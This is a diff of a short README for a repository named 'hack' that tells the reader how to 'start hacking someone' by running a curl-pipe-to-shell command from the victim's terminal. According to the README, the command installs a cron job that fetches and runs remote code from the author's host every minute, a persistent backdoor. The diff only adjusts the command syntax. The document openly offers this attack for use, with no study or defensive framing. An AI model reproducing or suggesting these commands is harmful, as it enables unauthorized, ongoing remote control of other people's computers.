ccorcos/hack/README.md

 # Hack

-Start hacking someone by running this command from their Terminal: `curl https://chet.sh/hack | sh`.
-That sets up a cron job every minute which pings `curl https://chet.sh/live | sh`.
+Start hacking someone by running this command from their Terminal: `curl -Ls chet.sh/hack | sh`.
+That sets up a cron job every minute which pings `curl chet.sh/live | sh`.

 Now go to your commandline and we can start having some fun.